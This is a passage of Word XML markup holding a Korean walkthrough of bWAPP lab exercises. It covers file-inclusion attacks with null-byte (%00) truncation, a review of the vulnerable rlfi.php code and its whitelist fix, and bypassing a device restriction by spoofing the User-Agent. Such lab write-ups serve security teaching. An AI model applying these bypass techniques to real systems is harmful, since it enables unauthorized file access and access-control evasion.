          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50AF7A6C" w14:textId="76F8608A" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3" w:rsidP="008134D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="319C9022" w14:textId="5E5247E2" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3" w:rsidP="008134D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="159C99A6" w14:textId="77777777" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3" w:rsidP="008134D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692B66B3" w14:textId="168025CB" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3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RFI 공격도 난이도 하에서 했던 것처럼 시도해본다. 역시 language 변수 파라미터 뒤에 %00를 넣어준다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4047A03C" w14:textId="33BF220A" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3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2A2B112B" wp14:editId="74C21CBD">
            <wp:extent cx="6840001" cy="4636102"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="1270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636102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899DF8" w14:textId="51663B5F" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3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공격에 성공한 것을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A008B7E" w14:textId="61F454C3" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3" w:rsidP="008134D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1E820E" w14:textId="209A77D7" w:rsidR="0092352A" w:rsidRPr="0035631E" w:rsidRDefault="0092352A" w:rsidP="0092352A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[ Remote &amp; Local File Inclusion (RFI/LFI) –</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 난이도 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>igh ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F4412E" w14:textId="157565E5" w:rsidR="0092352A" w:rsidRPr="0035631E" w:rsidRDefault="0092352A" w:rsidP="0092352A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D2B00C" w14:textId="749A56AC" w:rsidR="0092352A" w:rsidRPr="0035631E" w:rsidRDefault="0092352A" w:rsidP="0092352A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17596406" wp14:editId="780EB78A">
            <wp:extent cx="6840001" cy="2255111"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="1206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255111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649D92" w14:textId="774C2C24" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="005846BA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5D60CAEB" wp14:editId="599F1222">
            <wp:extent cx="6840001" cy="2200719"/>
            <wp:effectExtent l="19050" t="19050" r="1841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200719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4650B9" w14:textId="0DDDDA74" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA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난이도 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>medium</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 했던 것처럼 난이도 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>high</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 시도했으나 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI/RFI </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>모두 아무런 메시지도 출력되지 않는다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13124658" w14:textId="3F216C45" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA" w:rsidP="008134D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004365CB" w14:textId="7BE53318" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA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이제 비박스 서버 내 코드를 확인해보자</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E6138F" w14:textId="1189D6A0" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA" w:rsidP="008134D3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Vi /var/www/bWAPP/rlfi.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3B94C0" w14:textId="5AC68BF9" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA" w:rsidP="008134D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DF4C3F9" w14:textId="59E69A6D" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA" w:rsidP="008134D3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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EBF23FB" wp14:editId="71627B27">
            <wp:extent cx="6840001" cy="5184572"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="165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518457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7E4076" w14:textId="2C872C75" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA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</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 코드는 난이도별 $language 변수를 어떻게 받는지에 대한 코드이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677BD6DE" w14:textId="77777777" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="275CC1E5" w14:textId="4BEF6FC0" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA" w:rsidP="008134D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195351A2" wp14:editId="2092B334">
            <wp:extent cx="6840001" cy="3248465"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2857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324846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F71B69" w14:textId="116ED640" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA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</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 코드는 난이도 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>igh에 적용되는 코드 부분이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9F07DF" w14:textId="641E208D" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68659713" w14:textId="2B20EE37" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA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난이도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l</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>ow에서는 GET 방식으로 받은 language 변수 파라미터 값을 그대로 include() 함수의 인자로 사용하여 LFI/RFI 공격에 취약하다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD161A3" w14:textId="77777777" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D9BB6DB" w14:textId="14E7FEA6" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA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난이도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m</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>edium에서는 GET 방식으로 받은 language 변수 파라미터 값에 ".php"를 덧붙인 다음에 그 값을 include() 함수의 인자로 사용하고 있는데, 이는 %00(NULL) 문자를 삽입하여 우회가 가능하므로 LFI/RFI 공격에 취약</w:t>
      </w:r>
      <w:r w:rsidR="0002154F" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034E933E" w14:textId="77777777" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78737495" w14:textId="320B9539" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA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난이도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h</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>igh에서는 GET 방식으로 받은 language 변수 파라미터 값에 대해 페이지가 의도한 파일에 대해서만 접근이 가능하도록 화이트리스트 방식 접근 제어를 함으로써, LFI/RFI 공격에 대응하고 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3B01D" w14:textId="5BA7C7E3" w:rsidR="005846BA" w:rsidRPr="0035631E" w:rsidRDefault="005846BA" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EAC3B5C" w14:textId="406E27D7" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CFB40C4" w14:textId="2DF07AFE" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DAB294D" w14:textId="2A5C76AB" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3841562A" w14:textId="3D934D25" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57034DA5" w14:textId="34C69E8A" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42BCE7AE" w14:textId="6410C5FE" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72887B8F" w14:textId="78F9186E" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072B1AFE" w14:textId="1BB72C76" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37086F35" w14:textId="77777777" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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E3D78" w:rsidRPr="0035631E" w14:paraId="0345C1A6" w14:textId="77777777" w:rsidTr="008046E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bookmarkStart w:id="14" w:name="F2"/>
          <w:bookmarkEnd w:id="14"/>
          <w:p w14:paraId="786CDC20" w14:textId="0352C34B" w:rsidR="006E3D78" w:rsidRPr="0035631E" w:rsidRDefault="00CB76E6" w:rsidP="008046EE">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40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instrText xml:space="preserve"> HYPERLINK  \l "F1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separate"/>
            </w:r>
            <w:r w:rsidR="001F0F99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4"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="001F0F99" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="001F0F99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4"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidR="001F0F9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estrict</w:t>
            </w:r>
            <w:r w:rsidR="001F0F9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 xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001F0F99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4"/>
              </w:rPr>
              <w:t>Device Access</w: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6E3D78" w:rsidRPr="0035631E" w14:paraId="198355C0" w14:textId="77777777" w:rsidTr="008046E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622A0E6" w14:textId="77777777" w:rsidR="006E3D78" w:rsidRPr="0035631E" w:rsidRDefault="006E3D78" w:rsidP="008046EE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BC81E76" w14:textId="18CFB1E1" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115" w:rsidP="005846BA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 xml:space="preserve">[ Restrict Device Access 난이도 : </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>공통</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E7B5BD" w14:textId="77777777" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4227344A" w14:textId="3E340BEC" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115" w:rsidP="005846BA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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AF35C23" wp14:editId="7DB76645">
            <wp:extent cx="6840001" cy="2009491"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="1016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00949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BA24BD" w14:textId="77777777" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AEFCDB7" w14:textId="4B550C8F" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115" w:rsidP="000E4115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lastRenderedPageBreak/>
        <w:t>페이지에 접속하면 일부</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 인증된 장치들만 이 페이지의 컨텐츠에 접근할 수 있다고 되어 있고,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB3AD30" w14:textId="77777777" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115" w:rsidP="000E4115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현재</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 이 페이지에 접근한 장치가 스마트폰 또는 태블릿(Apple/Android) 장치가 아니라는 메시지가 출력되어 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351877F2" w14:textId="62C7359F" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="000E4115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여기서는 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>우회를 통하여 페이지의 내용에 대한 접근이 가능하다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BE13E0" w14:textId="77777777" w:rsidR="000F3AA9" w:rsidRPr="0035631E" w:rsidRDefault="000E4115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먼저 접속</w:t>
      </w:r>
      <w:r w:rsidR="00C53B67" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 시도를</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 위</w:t>
      </w:r>
      <w:r w:rsidR="00C53B67" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C53B67" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>Use</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>r-agent</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>변경</w:t>
      </w:r>
      <w:r w:rsidR="00C53B67" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이 필요하다. 다음 링크들은 다양한 </w:t>
      </w:r>
      <w:r w:rsidR="00C53B67" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>User-Agent</w:t>
      </w:r>
      <w:r w:rsidR="00C53B67" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 제공하거나 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56330DDD" w14:textId="59A7FBF2" w:rsidR="00C53B67" w:rsidRPr="0035631E" w:rsidRDefault="000F3AA9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관련 </w:t>
      </w:r>
      <w:r w:rsidR="00C53B67" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>프로그램을 다운받을 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178AF533" w14:textId="55750EE6" w:rsidR="000E4115" w:rsidRPr="0035631E" w:rsidRDefault="009678B1" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId77" w:history="1">
        <w:r w:rsidR="00C53B67" w:rsidRPr="0035631E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          </w:rPr>
          <w:t>https://addons.mozilla.org/ko/firefox/addon/user-agent-switcher-revived/?src=search</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00273D96" w14:textId="743F818A" w:rsidR="00C53B67" w:rsidRPr="0035631E" w:rsidRDefault="009678B1" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId78" w:history="1">
        <w:r w:rsidR="00C53B67" w:rsidRPr="0035631E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          </w:rPr>
          <w:t>https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg/related</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C9E9F3C" w14:textId="3CFA49CB" w:rsidR="00625FE6" w:rsidRPr="0035631E" w:rsidRDefault="009678B1" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId79" w:history="1">
        <w:r w:rsidR="00C53B67" w:rsidRPr="0035631E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
